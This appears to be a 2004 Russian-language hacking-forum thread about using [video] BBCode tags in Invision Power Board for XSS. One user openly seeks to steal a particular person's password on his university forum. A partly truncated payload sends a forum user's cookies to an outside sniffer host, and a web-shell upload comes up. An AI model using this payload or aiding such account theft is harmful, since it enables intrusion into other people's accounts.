|
Вопрос про теги [video], [sound] в форумах Ipb.
Мне вот интерестно. На Вашем сайте, предоставлены тексты по взлому IPB форума, вот только не указывайте, про какую вверсию идёт речь. Или я может чего пропустил.
Так как на практике (вы уж извините. Новичек, который поставил свой форум и пробует, что к чему) тэги [video] не переходит в <embed> и соотвественно, теряет свой смысл как таковой. Может я чего не допонял, но перепробовал разные варианты по этому поводу! Заранее спасибо ® |
Описываемые в статьях теги [video], [sound] и тд присутствуют в русифицированных версиях IPB, например в "Русский Модифицированный IPB v1.3 Final"
|
Хотів перевірити ці "уязвімості" на одгому IPB форумі, а там взагалі немає тегів [video] i [sound] Лише [img], [url], [email]... Версія форуму 2.0.0 (Тріал) Підкажіть, будь-ласка, шо робити http://forum.antichat.ru/iB_html/non...ticons/sad.gif
|
жека, хлопiц, я нихуi нe понял, о чем ты http://forum.antichat.ru/iB_html/non...icons/turn.gif
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ октября 10 2004,16:38)</td></tr><tr><td id="QUOTE">жека, хлопiц, я нихуi нe понял, о чем ты http://forum.antichat.ru/iB_html/non...icons/turn.gif[/QUOTE]<span id='postcolor'>
Ой... А я думал у Вас по-нашему понимают. Тогда сорри, буду по-вашему http://forum.antichat.ru/iB_html/non...cons/smile.gif . В-общем, ситуация такая: Надо попустить одного "товарища" на форуме нашего универа. Физически это сделать не представляется возможным (тип выехал из Киева в Австрию). Я не понимаю, почему его не банят, но уверен, что на мои просьбы админ этого не сделает. По этому не лишним было бы пи..донуть его пароль. Ближе к делу: я в программировании и прочих делах не шарю пока вообще, по-этому слепо действовал по инструции. Так вот выяснилось, что на нашем форуме таких функций, как вставка [video] нет... Есть [img], [url], [email]. Это я что-то не так понял, или акое действительно бывает? Вот адресс. Буду очень признателен, если поможешь разобраться http://forum.antichat.ru/iB_html/non...cons/smile.gif |
Хмм ... По-моему, тут xss не пройдет нигде ...
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ октября 10 2004,17:53)</td></tr><tr><td id="QUOTE">Хмм ... По-моему, тут xss не пройдет нигде ...[/QUOTE]<span id='postcolor'>
Это значит, что через сниффер (или как там оно называется?) ничего взять не получиться? |
Только ип и реферер ... Но они врядли что-нибудь дадут ...
|
А еще какие-то методы есть? Пускай даже самые нереальные?
|
Кстати, а что будет, если просто тупо выложить на форуме сцылку на сниффер, и кто-то по ней клацнет?
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (жека @ октября 10 2004,18:58)</td></tr><tr><td id="QUOTE">Кстати, а что будет, если просто тупо выложить на форуме сцылку на сниффер, и кто-то по ней клацнет?[/QUOTE]<span id='postcolor'>
Так ты куки не сможешь получить. А именно они то и нужны... Но ваще-то форум ломается... Но как - не скажу...ищи сам )) |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ октября 10 2004,20:09)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (жека @ октября 10 2004,18:58)</td></tr><tr><td id="QUOTE">Кстати, а что будет, если просто тупо выложить на форуме сцылку на сниффер, и кто-то по ней клацнет?[/QUOTE]<span id='postcolor'>
Так ты куки не сможешь получить. А именно они то и нужны... Но ваще-то форум ломается... Но как - не скажу...ищи сам ))[/QUOTE]<span id='postcolor'> Ну скажи! http://forum.antichat.ru/iB_html/non...s/rolleyes.gif Я ж ламер, сам не догадаюсь... Я еще толком не въехал, что такое эти "куки" http://forum.antichat.ru/iB_html/non...ticons/sad.gif Помоги, будь человеком http://forum.antichat.ru/iB_html/non...cons/smile.gif |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (жека @ октября 11 2004,00:06)</td></tr><tr><td id="QUOTE">Ну скажи! http://forum.antichat.ru/iB_html/non...s/rolleyes.gif Я ж ламер, сам не догадаюсь... Я еще толком не въехал, что такое эти "куки" http://forum.antichat.ru/iB_html/non...ticons/sad.gif[/QUOTE]<span id='postcolor'>
Вот именно поэтому и не скажу, иначе ты так и останешся ламером... |
Algol, зря ты так ... Дело не в этом - скажу или не скажу ...
|
Ну, мужики, помогите! У меня просто времени нет учиться єтому http://forum.antichat.ru/iB_html/non...ticons/sad.gif Учеба, работа...
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ октября 11 2004,12:05)</td></tr><tr><td id="QUOTE">Вот именно поэтому и не скажу, иначе ты так и останешся ламером...[/QUOTE]<span id='postcolor'>
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Вот именно поэтому и не скажу, иначе ты так и останешся ламером...[/QUOTE]<span id='postcolor'> ну хотя бы намекни тогда...в каком направление копать надо... |
В том же направлении, в котором и описано в статьях про IPB )
|
А на примере конкретном можите показать как взламывать ???? http://forum.antichat.ru/iB_html/non...ticons/sad.gif
|
Какие-то злые они... http://forum.antichat.ru/iB_html/non...ticons/sad.gif Открыли форум, а простым смертным помогать не хотят.
|
уязвимость содержится в пакете Invision Power Board версии 2.0
http://www.rootlab.ru/news.php?view=295 |
zFailure а ты понял в чем уязвимость...?
|
может я тупой...но я ничего не понял...
|
2 Егорыч+++
честно говоря пока еще не собирался! http://forum.antichat.ru/iB_html/non...ns/biggrin.gif |
значит , получил я пас админа , патыююсь , через смайлы залить remview.php , но запись запрещена , остаётся потделать html запрос , но я никак не поня как его потделать , раскажите подробней
|
Опишите пожалуйста что есть снифеер и с чем его едят? http://forum.antichat.ru/iB_html/non...ticons/sad.gif Нигде толком не сказано http://forum.antichat.ru/iB_html/non...s/confused.gif
|
Да, у меня тоже по снифферам вопрос.В руководстве по взлому IPB написан какой-то bla-bla-bla.cgi? Его так и надо указать или надо указать адрес сниффера, который выложен здесь. Народ, помоготе плз.Срочно!!!
|
Headhunter, нужно вписать или тот, который на античате, или свой.
Как сделать свой, стучи в асю... |
То есть получается, что то самое сообщение, которое нужно посать выглядит так:
[video]http://1.ru e=`[/video]` style=display:none;background:url(javascript:docum ent.images[12].src="http://http://antichat.ru/cgi-bin/s....ocument.cookie) Lol Или как-то по-другому? А в referer тогда нужно указать адрес форума или что? Помогите плз, очень нужно!!! |
Не плохо бы было к статье по взлому добавить способы защиты, бывает очень полезно.
|
| Время: 01:58 |